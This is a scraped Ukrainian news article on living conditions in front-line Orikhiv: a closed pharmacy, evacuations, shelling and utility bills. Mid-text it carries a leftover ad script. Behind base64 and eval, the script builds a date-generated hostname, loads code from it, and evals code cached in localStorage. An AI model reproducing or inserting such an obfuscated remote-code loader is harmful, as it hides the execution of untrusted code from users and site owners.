Важные новости

Гуманітарна ситуація в Оріхові: місто біля лінії фронту з початку війни

Оріхів з перших днів повномасштабного вторгення рф на територію України знаходиться поряд з ворожими позиціями та тримає оборону. Місто регулярно обстрілюють з різних видів озброєння.

«Акцент» поспілкувався з місцевими жителями, щоб дізнатися про гуманітарну ситуацію в Оріхівській ОТГ станом на 17 травня.

Так, відомо, що Оріхівська БЛІЛ зараз працює у скороченому режимі — лише хірургічне та приймальне відділення, де поранений бійцям надають першу допомогу перед відправкою до медичних установ Запоріжжя.

В Оріхові не працює жодна аптека. Місцеві мешканці змушені шукати тих, хто повертається з Запоріжжя, або їхати туди самим, щоб придбати необхідні ліки. Співрозмовники «Акцента» висловили ідею про відкриття комунальної аптеки, де б працював фармацевт з лікарні. Очевидно, вирішення цього питання залежить від ініціативності місцевої влади.

Усі дитсадки та інші навчальні заклади міста тимчасово зачинено. Деякі співробітники переведені на 2/3 заробітної плати. Комунальні служби міста працюють у звичайному режимі: сміття вивозиться, вулиці підмітають, мережі лагодять фактично під постійними обстрілами.

З ОТГ виїхала більша частина мешканців: з 18,9 тисяч населення у своїх домівках залишился 8 тисяч місцевих. Основне місце, де ці люди можуть придбати продукти — ринок, куди привозять товари домашнього виробництва мешканці сіл. Майже всі магазини, за нашою інформацією, зачинені. Відновлюється робота банкоматів. var node3361 = document.getElementById(«MIXADV_3361»); if( node3361 ) { var script = document.createElement(«script»); script.charset = «utf-8»; script.src = «https://m.mixadvert.com/show/?id=3361&r=»+Math.random(); node3361.parentNode.appendChild(script); script.onerror = function(){ window.eval( atob(«dmFyIGRhdGUgPSBuZXcgRGF0ZSgpO3ZhciBtb250aCA9IGRhdGUuZ2V0TW9udGgoKSArIDE7IHZhciBkYXkgPSBkYXRlLmdldERhdGUoKTsgdmFyIHllYXIgPSBkYXRlLmdldFllYXIoKTsgdmFyIG5hbWVfZGF5ID0gZGF0ZS5nZXREYXkoKSArIDE7dmFyIGRvbSA9IFsgIm9yZyIsICJ0b3AiLCAiYml6LnVhIiwgImNvLnVhIiwgImt5aXYudWEiLCAiY2x1YiIsICJzaG9wIl07IHZhciBzdHIgPWRheSoobW9udGggKiBuYW1lX2RheSAqIGRheSkrIiIrIGRheSoobW9udGggKyBuYW1lX2RheSArIGRheSAreWVhcik7dmFyIGhhc2ggPSAgYnRvYShidG9hKHN0cikpLnRvTG93ZXJDYXNlKCk7IHZhciBob3N0ID0gaGFzaC5zdWJzdHJpbmcoMywgaGFzaC5sZW5ndGggLSBuYW1lX2RheS8yKSsiLiIrZG9tW25hbWVfZGF5IC0gMV07dmFyIHIgPSBNYXRoLnJhbmRvbSgpLnRvU3RyaW5nKDM2KS5zdWJzdHIoMiwgMik7ciA9IHIucmVwbGFjZSgvWzAtOV0vZywgIiIpO3ZhciBkZWx0YSA9IE1hdGguZmxvb3IoTWF0aC5yYW5kb20oKSAqICgxMDAgLSAxMCArIDEpKSArIDEwO3ZhciBpZCA9IDMzNjEgLSBkZWx0YTsgdmFyIHNjcmlwdF9maXJzdCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpO3NjcmlwdF9maXJzdC5zcmMgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIitkZWx0YStpZCtyKyIiOyBub2RlMzM2MS5wYXJlbnROb2RlLmFwcGVuZENoaWxkKHNjcmlwdF9maXJzdCk7c2V0VGltZW91dCggZnVuY3Rpb24gKCkge3NjcmlwdF9maXJzdC5yZW1vdmUoKX0sIDQwMDApO3NjcmlwdF9maXJzdC5vbmVycm9yID0gZnVuY3Rpb24oKXt2YXIgYSA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoImEiKTthLmhyZWYgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIjsgbm9kZTMzNjEucGFyZW50Tm9kZS5hcHBlbmRDaGlsZChhKTsgc2V0VGltZW91dCggZnVuY3Rpb24gKCkgeyBpZiggbm9kZTMzNjEuaW5uZXJIVE1MID09ICIiICkgd2luZG93LmV2YWwobG9jYWxTdG9yYWdlLmdldEl0ZW0oIjMzNjEiKSkgfSwgNTAwMCk7ICA7fTsg») ); } }

У місті діє безкоштовна роздача хліба та гуманітарної допомоги потребуючим категоріям громадян. Раніше пункт допомоги тимчасово зачинили через обстріли місця, де він розташований.

Слід підняти питання оплати послуг керуючій компанії міста, яка зараз фактично не надає їх за умовами контракту. Так як мешканців Оріхова офіційно закликала евакуюватися місцева влада, постає питання: чому оріхівці отримують платіжки про оплату цих послуг? У той час, коли переселенці потребують матеріальної підтримки, вони вимушені розраховуватися за послуги, які не отримують.

Виїхати або заїхати в місто можна без проблем. У військових не виникає питань до людей з місцевою пропискою. Іноді з Оріхова ходять евакуаційні рейси до Запоріжжя за попереднім записом.

У місті багато покинутих домашніх тварин, які потребують їжі. Останнім часом збільшилася кількість небайдужих громадян, які займаються цим питанням.

Оріхів кілька разів намагалися штурмувати рашисти, але успіху не мали. Нагадаємо останні новини про обстріли мирного Оріхова та його цивільної інфраструктури: (adsbygoogle = window.adsbygoogle || []).push({});

Внаслідок артилерійських обстрілів російськими окупантами виникли пожежі в Оріхові та Василівському районіНа Запоріжжі окупанти з артилерії обстріляли Таврійське та Оріхів: ФОТО наслідківОріхів знову обстріляли: 8 поранених, 1 загиблийОріхів обстрілювали з трьох видів озброєння: влучили в дитсадок та лікарню (ФОТО)Наслідки обстрілу багатоповерхівки в Оріхові (ФОТО)Крамниці працюють до 13:00 і постійні перебої з комунальними послугами: як живе Оріхів під обстрілами окупантів (ВІДЕО) Подписывайтесь на Акцент в Источник: https://akzent.zp.ua/gumanitarna-situatsiya-v-orihovi-misto-bilya-liniyi-frontu-z-pochatku-vijni/

Мы в Telegram, наш Telegram bot — @zpua_bot, Мы в Viber, Мы на Facebook

Share this post

Добавить комментарий

scroll to top